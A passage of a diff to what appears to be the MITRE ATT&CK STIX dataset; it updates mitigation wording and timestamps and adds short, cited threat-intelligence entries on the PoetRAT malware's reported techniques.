"description": "Install software in write-protected locations. Set directory access controls to prevent file writes to the search paths for applications, both in the folders where applications are run from and the standard library folders.",
"id": "relationship--7253ab74-8fbb-422b-bf37-258981865b87",
"type": "relationship",
- "modified": "2020-03-26T20:07:01.089Z",
+ "modified": "2020-06-20T21:53:08.420Z",
"created": "2020-03-26T16:17:09.665Z"
},
{
@@ -175509,10 +176821,10 @@
"source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
"target_ref": "attack-pattern--633a100c-b2c9-41bf-9be5-905c1b16c825",
"relationship_type": "mitigates",
- "description": "Adversaries may use new payloads to execute this technique. Identify and block potentially malicious software executed through hijacking by using application whitelisting solutions also capable of blocking libraries loaded by legitimate software.",
+ "description": "Adversaries may use new payloads to execute this technique. Identify and block potentially malicious software executed through hijacking by using application control solutions also capable of blocking libraries loaded by legitimate software.",
"id": "relationship--0fc95a6b-296f-41ab-8663-aea4a80afe0a",
"type": "relationship",
- "modified": "2020-03-26T18:46:55.963Z",
+ "modified": "2020-06-20T20:11:42.902Z",
"created": "2020-03-26T18:45:03.794Z"
},
{
@@ -175533,7 +176845,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-26T20:07:01.123Z",
+ "modified": "2020-06-20T21:53:08.415Z",
"created": "2020-03-26T19:30:46.421Z"
},
{
@@ -175547,7 +176859,7 @@
"description": "Limit privileges of user accounts and groups so that only authorized administrators can interact with service changes and service binary target path locations. Deny execution from user directories such as file download directories and temp directories where able.\n\nEnsure that proper permissions and directory access control are set to deny users the ability to write files to the top-level directory C: and system directories, such as C:\\Windows\\, to reduce places where malicious files could be placed for execution.",
"id": "relationship--523ef32d-7463-4774-a473-fcccb5b0dadd",
"type": "relationship",
- "modified": "2020-03-26T20:07:01.197Z",
+ "modified": "2020-06-20T21:53:08.496Z",
"created": "2020-03-26T19:33:32.779Z"
},
{
@@ -175561,7 +176873,7 @@
"description": "Ensure proper permissions are set for Registry hives to prevent users from modifying keys for system components that may lead to privilege escalation.",
"id": "relationship--85422378-e9d7-4bd2-8b57-73fba0641448",
"type": "relationship",
- "modified": "2020-03-26T20:07:01.194Z",
+ "modified": "2020-06-20T21:53:08.492Z",
"created": "2020-03-26T19:40:38.563Z"
},
{
@@ -175575,7 +176887,7 @@
"description": "Utilize Yama (ex: /proc/sys/kernel/yama/ptrace_scope) to mitigate ptrace based process injection by restricting the use of ptrace to privileged users only. Other mitigation controls involve the deployment of security kernel modules that provide advanced access control and process restrictions such as SELinux, grsecurity, and AppArmor.",
"id": "relationship--78af537b-48cc-411d-a209-3e01c44aa87b",
"type": "relationship",
- "modified": "2020-03-31T13:08:37.120Z",
+ "modified": "2020-06-20T22:16:03.779Z",
"created": "2020-03-26T20:27:44.220Z"
},
{
@@ -175677,10 +176989,10 @@
"source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
"target_ref": "attack-pattern--b83e166d-13d7-4b52-8677-dff90c548fd7",
"relationship_type": "mitigates",
- "description": "System settings can prevent applications from running that haven't been downloaded through the Apple Store (or other legitimate repositories) which can help mitigate some of these issues. Also enable whitelisting solutions such as AppLocker and/or Device Guard to block the loading of malicious content.",
+ "description": "System settings can prevent applications from running that haven't been downloaded through the Apple Store (or other legitimate repositories) which can help mitigate some of these issues. Also enable application control solutions such as AppLocker and/or Device Guard to block the loading of malicious content.",
"id": "relationship--15b9b22e-7896-4219-8ec9-59b099644a6f",
"type": "relationship",
- "modified": "2020-03-31T12:49:36.985Z",
+ "modified": "2020-06-20T22:40:30.919Z",
"created": "2020-03-27T13:14:04.866Z"
},
{
@@ -175701,7 +177013,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-31T12:49:37.002Z",
+ "modified": "2020-06-20T22:40:30.928Z",
"created": "2020-03-27T13:32:37.810Z"
},
{
@@ -175722,7 +177034,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-31T12:49:37.004Z",
+ "modified": "2020-06-20T22:40:30.951Z",
"created": "2020-03-27T13:32:37.823Z"
},
{
@@ -175736,7 +177048,7 @@
"description": "Ensure proper permissions are set for Registry hives to prevent users from modifying keys related to SIP and trust provider components. Components may still be able to be hijacked to suitable functions already present on disk if malicious modifications to Registry keys are not prevented.",
"id": "relationship--a152969e-2530-4cb7-acdf-f93b138116d0",
"type": "relationship",
- "modified": "2020-03-31T12:49:37.028Z",
+ "modified": "2020-06-20T22:40:30.949Z",
"created": "2020-03-27T13:32:37.825Z"
},
{
@@ -175788,7 +177100,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-31T12:53:56.511Z",
+ "modified": "2020-06-17T14:25:38.414Z",
"created": "2020-03-27T19:51:21.977Z"
},
{
@@ -176083,7 +177395,7 @@
"description": "MSBuild.exe may not be necessary within an environment and should be removed if not being used.",
"id": "relationship--a6c274f5-43e1-4f69-a182-0c4ab9d0a5ed",
"type": "relationship",
- "modified": "2020-03-29T19:56:43.333Z",
+ "modified": "2020-06-08T23:29:28.275Z",
"created": "2020-03-27T21:50:26.217Z"
},
{
@@ -176134,11 +177446,11 @@
"url": "https://researchcenter.paloaltonetworks.com/2017/06/unit42-paranoid-plugx/"
}
],
- "description": "A version of [PlugX](https://attack.mitre.org/software/S0013) loads as shellcode within a .NET Framework project using msbuild.exe, presumably to bypass application whitelisting techniques.(Citation: Palo Alto PlugX June 2017)",
+ "description": "A version of [PlugX](https://attack.mitre.org/software/S0013) loads as shellcode within a .NET Framework project using msbuild.exe, presumably to bypass application control techniques.(Citation: Palo Alto PlugX June 2017)",
"relationship_type": "uses",
"id": "relationship--652af94a-7ff3-4d47-89e5-154c7bc34258",
"type": "relationship",
- "modified": "2020-03-27T21:54:12.731Z",
+ "modified": "2020-06-20T21:43:42.905Z",
"created": "2020-03-27T21:54:12.731Z"
},
{
@@ -176365,10 +177677,10 @@
"source_ref": "course-of-action--d2a24649-9694-4c97-9c62-ce7b270bf6a3",
"target_ref": "attack-pattern--457c7820-d331-465a-915e-42f85500ccc4",
"relationship_type": "mitigates",
- "description": "Microsoft's Enhanced Mitigation Experience Toolkit (EMET) Attack Surface Reduction (ASR) feature can be used to block methods of using using trusted binaries to bypass whitelisting.",
+ "description": "Microsoft's Enhanced Mitigation Experience Toolkit (EMET) Attack Surface Reduction (ASR) feature can be used to block methods of using using trusted binaries to bypass application control.",
"id": "relationship--1f1de0ea-581b-4b41-953f-1b8f552f84e7",
"type": "relationship",
- "modified": "2020-03-29T17:18:45.986Z",
+ "modified": "2020-06-20T22:30:57.257Z",
"created": "2020-03-29T17:17:31.571Z"
},
{
@@ -176382,7 +177694,7 @@
"description": "Restrict execution of particularly vulnerable binaries to privileged accounts or groups that need to use it to lessen the opportunities for malicious usage.",
"id": "relationship--6dc1f5ca-8881-4d06-b192-7bc502ea94ce",
"type": "relationship",
- "modified": "2020-03-29T17:18:46.015Z",
+ "modified": "2020-06-20T22:30:57.280Z",
"created": "2020-03-29T17:17:31.592Z"
},
{
@@ -176393,10 +177705,10 @@
"source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
"target_ref": "attack-pattern--457c7820-d331-465a-915e-42f85500ccc4",
"relationship_type": "mitigates",
- "description": "Consider using application whitelisting to prevent execution of binaries that are susceptible to abuse and not required for a given system or network.",
+ "description": "Consider using application control to prevent execution of binaries that are susceptible to abuse and not required for a given system or network.",
"id": "relationship--95e4e360-b867-48b4-a494-d9d148232b70",
"type": "relationship",
- "modified": "2020-03-29T17:18:46.013Z",
+ "modified": "2020-06-20T22:30:57.278Z",
"created": "2020-03-29T17:17:31.597Z"
},
{
@@ -176410,7 +177722,7 @@
"description": "Many native binaries may not be necessary within a given environment.",
"id": "relationship--c8c7f580-982a-4efc-8a2a-e007e7f07220",
"type": "relationship",
- "modified": "2020-03-29T17:18:46.011Z",
+ "modified": "2020-06-20T22:30:57.289Z",
"created": "2020-03-29T17:17:31.594Z"
},
{
@@ -176452,7 +177764,7 @@
"description": "Ensure proper Registry permissions are in place to prevent adversaries from disabling or interfering with security/logging services.",
"id": "relationship--c0aa0cf1-4c03-4fdd-bdbb-65563bff4a81",
"type": "relationship",
- "modified": "2020-03-29T21:49:59.811Z",
+ "modified": "2020-06-25T15:47:30.039Z",
"created": "2020-03-29T21:49:59.811Z"
},
{
@@ -176541,7 +177853,7 @@
"relationship_type": "uses",
"id": "relationship--d3dbd171-a82c-4fef-ba16-2355dd9b513e",
"type": "relationship",
- "modified": "2020-03-29T22:57:53.216Z",
+ "modified": "2020-07-15T13:03:46.811Z",
"created": "2020-03-29T22:57:53.216Z"
},
{
@@ -176941,19 +178253,6 @@
"modified": "2020-03-30T20:18:09.529Z",
"created": "2020-03-30T20:18:09.529Z"
},
- {
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "source_ref": "attack-pattern--10d5f3b7-6be6-4da5-9a77-0f1e2bbfcc44",
- "target_ref": "attack-pattern--791481f8-e96a-41be-b089-a088763083d4",
- "relationship_type": "revoked-by",
- "id": "relationship--9dfc000d-550a-40ae-b419-59517cb187b3",
- "type": "relationship",
- "modified": "2020-03-30T20:20:02.798Z",
- "created": "2020-03-30T20:20:02.798Z"
- },
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -177111,6 +178410,26543 @@
"modified": "2020-03-30T21:08:00.433Z",
"created": "2020-03-30T21:08:00.433Z"
},
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--cc2399fd-3cd3-4319-8d0a-fbd6420cdaf8",
+ "target_ref": "attack-pattern--144e007b-e638-431d-a894-45d90c54ab90",
+ "relationship_type": "mitigates",
+ "description": "Routinely monitor user permissions to ensure only the expected users have the capability to modify cloud compute infrastructure components.",
+ "id": "relationship--91c4630e-772b-4dac-8e58-5a899ccdc2be",
+ "type": "relationship",
+ "modified": "2020-06-18T11:38:27.847Z",
+ "created": "2020-04-27T14:14:05.600Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cc5497f7-a9e8-436f-94da-b2b4a9b9ad3c",
+ "target_ref": "attack-pattern--fb8d023d-45be-47e9-bc51-f56bcae6435b",
+ "external_references": [
+ {
+ "source_name": "Talos PoetRAT April 2020",
+ "url": "https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html",
+ "description": "Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020."
+ }
+ ],
+ "description": "[PoetRAT](https://attack.mitre.org/software/S0428) has used [FTP](https://attack.mitre.org/software/S0095) for exfiltration.(Citation: Talos PoetRAT April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--613ba18d-d23b-443a-9e1a-c2d564132fe2",
+ "type": "relationship",
+ "modified": "2020-04-27T21:02:32.990Z",
+ "created": "2020-04-27T20:40:03.104Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cc5497f7-a9e8-436f-94da-b2b4a9b9ad3c",
+ "target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "external_references": [
+ {
+ "source_name": "Talos PoetRAT April 2020",
+ "url": "https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html",
+ "description": "Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020."
+ }
+ ],
+ "description": "[PoetRAT](https://attack.mitre.org/software/S0428) has used spearphishing attachments to infect victims.(Citation: Talos PoetRAT April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--20118b8d-dc6e-4c71-8d99-789901c10e73",
+ "type": "relationship",
+ "modified": "2020-04-29T16:00:35.642Z",
+ "created": "2020-04-27T20:40:03.132Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cc5497f7-a9e8-436f-94da-b2b4a9b9ad3c",
+ "target_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
+ "external_references": [
+ {
+ "source_name": "Talos PoetRAT April 2020",
+ "url": "https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html",
+ "description": "Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020."
+ }
+ ],
+ "description": "[PoetRAT](https://attack.mitre.org/software/S0428) has used Word documents with VBScripts to execute malicious activities.(Citation: Talos PoetRAT April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--b078c987-40be-459f-9045-4b2b92cc145b",
+ "type": "relationship",
+ "modified": "2020-04-27T21:02:32.971Z",
+ "created": "2020-04-27T21:02:32.971Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cc5497f7-a9e8-436f-94da-b2b4a9b9ad3c",
+ "target_ref": "attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8",
+ "external_references": [
+ {
+ "source_name": "Talos PoetRAT April 2020",
+ "url": "https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html",
+ "description": "Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020."
+ }
+ ],
+ "description": "[PoetRAT](https://attack.mitre.org/software/S0428) has used a Python tool named Browdec.exe to steal browser credentials.(Citation: Talos PoetRAT April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--f3927864-d7dd-4bf3-8b2a-2a5445eb4004",
+ "type": "relationship",
+ "modified": "2020-04-28T12:47:25.822Z",
+ "created": "2020-04-28T12:47:25.822Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cc5497f7-a9e8-436f-94da-b2b4a9b9ad3c",
+ "target_ref": "attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4",
+ "external_references": [
+ {
+ "source_name": "Talos PoetRAT April 2020",
+ "url": "https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html",
+ "description": "Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020."
+ }
+ ],
+ "description": "[PoetRAT](https://attack.mitre.org/software/S0428) has used a Python tool named klog.exe for keylogging.(Citation: Talos PoetRAT April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--fac88cac-2935-4c68-af9f-c16fb93d6eac",
+ "type": "relationship",
+ "modified": "2020-04-28T12:47:25.828Z",
+ "created": "2020-04-28T12:47:25.827Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cc5497f7-a9e8-436f-94da-b2b4a9b9ad3c",
+ "target_ref": "attack-pattern--6faf650d-bf31-4eb4-802d-1000cf38efaf",
+ "external_references": [
+ {
+ "source_name": "Talos PoetRAT April 2020",
+ "url": "https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html",
+ "description": "Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020."
+ }
+ ],
+ "description": "[PoetRAT](https://attack.mitre.org/software/S0428) has used a Python tool named Bewmac to record the webcam on compromised hosts.(Citation: Talos PoetRAT April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--52ad9918-ffba-4897-bbdc-261504094339",
+ "type": "relationship",
+ "modified": "2020-04-28T12:47:25.847Z",
+ "created": "2020-04-28T12:47:25.847Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cc5497f7-a9e8-436f-94da-b2b4a9b9ad3c",
+ "target_ref": "attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776",
+ "external_references": [
+ {
+ "source_name": "Talos PoetRAT April 2020",
+ "url": "https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html",
+ "description": "Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020."
+ }
+ ],
+ "description": "[PoetRAT](https://attack.mitre.org/software/S0428) has used a .NET tool named dog.exe to exiltrate information over an e-mail account.(Citation: Talos PoetRAT April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--1b29f7b8-78fe-4bae-b943-59641a12a023",
+ "type": "relationship",
+ "modified": "2020-04-28T14:37:51.325Z",
+ "created": "2020-04-28T12:47:25.851Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cc5497f7-a9e8-436f-94da-b2b4a9b9ad3c",
+ "target_ref": "attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688",
+ "external_references": [
+ {
+ "source_name": "Talos PoetRAT April 2020",
+ "url": "https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html",
+ "description": "Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020."
+ }
+ ],
+ "description": "[PoetRAT](https://attack.mitre.org/software/S0428) has the ability to take screen captures.(Citation: Talos PoetRAT April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--d9338b91-b07b-4ea1-9e2f-4fe06e58ce62",
+ "type": "relationship",
+ "modified": "2020-04-28T12:47:25.887Z",
+ "created": "2020-04-28T12:47:25.887Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cc5497f7-a9e8-436f-94da-b2b4a9b9ad3c",
+ "target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279",
+ "external_references": [
+ {
+ "source_name": "Talos PoetRAT April 2020",
+ "url": "https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html",
+ "description": "Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020."
+ }
+ ],
+ "description": "[PoetRAT](https://attack.mitre.org/software/S0428) has added a registry key in the hive for persistence.(Citation: Talos PoetRAT April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--e7f60c3a-5b9e-4175-8bac-72773f580dad",
+ "type": "relationship",
+ "modified": "2020-04-28T12:47:25.920Z",
+ "created": "2020-04-28T12:47:25.920Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cc5497f7-a9e8-436f-94da-b2b4a9b9ad3c",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "Talos PoetRAT April 2020",
+ "url": "https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html",
+ "description": "Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020."
+ }
+ ],
+ "description": "[PoetRAT](https://attack.mitre.org/software/S0428) has the ability to copy files and download/upload files into command and control channels (C2) using [FTP](https://attack.mitre.org/software/S0095).(Citation: Talos PoetRAT April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--3337112a-0b29-450f-9183-a0ec428c4898",
+ "type": "relationship",
+ "modified": "2020-04-29T18:44:05.149Z",
+ "created": "2020-04-28T12:47:25.938Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cc5497f7-a9e8-436f-94da-b2b4a9b9ad3c",
+ "target_ref": "attack-pattern--30208d3e-0d6b-43c8-883e-44462a514619",
+ "external_references": [
+ {
+ "source_name": "Talos PoetRAT April 2020",
+ "url": "https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html",
+ "description": "Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020."
+ }
+ ],
+ "description": "[PoetRAT](https://attack.mitre.org/software/S0428) used file system monitoring to track modification and enable automatic exfiltration.(Citation: Talos PoetRAT April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--47aebf09-4bee-4639-94e3-27b095d7558a",
+ "type": "relationship",
+ "modified": "2020-04-29T19:30:54.527Z",
+ "created": "2020-04-28T12:47:25.929Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cc5497f7-a9e8-436f-94da-b2b4a9b9ad3c",
+ "target_ref": "attack-pattern--29be378d-262d-4e99-b00d-852d573628e6",
+ "external_references": [
+ {
+ "source_name": "Talos PoetRAT April 2020",
+ "url": "https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html",
+ "description": "Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020."
+ }
+ ],
+ "description": "[PoetRAT](https://attack.mitre.org/software/S0428) checked the size of the hard drive to determine if it was being run in a sandbox environment. In the event of sandbox detection, it would delete itself by overwriting the malware scripts with the contents of \"License.txt\" and exiting.(Citation: Talos PoetRAT April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--6340a1e8-4880-4c91-b4fd-ce909b35b87f",
+ "type": "relationship",
+ "modified": "2020-04-29T18:44:05.083Z",
+ "created": "2020-04-28T12:47:25.941Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cc5497f7-a9e8-436f-94da-b2b4a9b9ad3c",
+ "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "external_references": [
+ {
+ "source_name": "Talos PoetRAT April 2020",
+ "url": "https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html",
+ "description": "Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020."
+ }
+ ],
+ "description": "[PoetRAT](https://attack.mitre.org/software/S0428) has the ability to list all running processes.(Citation: Talos PoetRAT April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--ab2602d5-a3f5-45d2-a522-9b4f87bc7a24",
+ "type": "relationship",
+ "modified": "2020-04-28T12:47:25.935Z",
+ "created": "2020-04-28T12:47:25.935Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cc5497f7-a9e8-436f-94da-b2b4a9b9ad3c",
+ "target_ref": "attack-pattern--ec8fc7e2-b356-455c-8db5-2e37be158e7d",
+ "external_references": [
+ {
+ "source_name": "Talos PoetRAT April 2020",
+ "url": "https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html",
+ "description": "Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020."
+ }
+ ],
+ "description": "[PoetRAT](https://attack.mitre.org/software/S0428) has the ability to hide and unhide files.(Citation: Talos PoetRAT April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--3758634e-bb33-4354-98f3-b662e8e7e83f",
+ "type": "relationship",
+ "modified": "2020-04-28T12:47:25.954Z",
+ "created": "2020-04-28T12:47:25.954Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cc5497f7-a9e8-436f-94da-b2b4a9b9ad3c",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "Talos PoetRAT April 2020",
+ "url": "https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html",
+ "description": "Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020."
+ }
+ ],
+ "description": "[PoetRAT](https://attack.mitre.org/software/S0428) has used a custom encryption scheme for communication between scripts.(Citation: Talos PoetRAT April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--e159049f-70c1-4349-b299-c1d99d06901d",
+ "type": "relationship",
+ "modified": "2020-04-28T12:47:25.933Z",
+ "created": "2020-04-28T12:47:25.933Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cc5497f7-a9e8-436f-94da-b2b4a9b9ad3c",
+ "target_ref": "attack-pattern--00f90846-cbd1-4fc5-9233-df5c2bf2a662",
+ "external_references": [
+ {
+ "source_name": "Talos PoetRAT April 2020",
+ "url": "https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html",
+ "description": "Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020."
+ }
+ ],
+ "description": "[PoetRAT](https://attack.mitre.org/software/S0428) has the ability to compress files with zip.(Citation: Talos PoetRAT April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--f64733fd-acc7-4570-90ee-79c117c37d7e",
+ "type": "relationship",
+ "modified": "2020-04-28T14:37:51.446Z",
+ "created": "2020-04-28T12:47:25.946Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cc5497f7-a9e8-436f-94da-b2b4a9b9ad3c",
+ "target_ref": "attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4",
+ "external_references": [
+ {
+ "source_name": "Talos PoetRAT April 2020",
+ "url": "https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html",
+ "description": "Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020."
+ }
+ ],
+ "description": "[PoetRAT](https://attack.mitre.org/software/S0428) has made registry modifications to alter its behavior upon execution.(Citation: Talos PoetRAT April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--2606ed25-9f1d-4e85-822a-af39ce0d8e66",
+ "type": "relationship",
+ "modified": "2020-04-28T12:47:25.943Z",
+ "created": "2020-04-28T12:47:25.943Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cc5497f7-a9e8-436f-94da-b2b4a9b9ad3c",
+ "target_ref": "attack-pattern--cc3502b5-30cc-4473-ad48-42d51a6ef6d1",
+ "external_references": [
+ {
+ "source_name": "Talos PoetRAT April 2020",
+ "url": "https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html",
+ "description": "Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020."
+ }
+ ],
+ "description": "[PoetRAT](https://attack.mitre.org/software/S0428) was executed with a Python script and worked in conjunction with additional Python-based post-exploitation tools.(Citation: Talos PoetRAT April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--d32fb833-c8ad-4d04-b998-3d62a6916966",
+ "type": "relationship",
+ "modified": "2020-04-29T18:44:05.098Z",
+ "created": "2020-04-28T12:47:25.948Z"
+ },
+ {
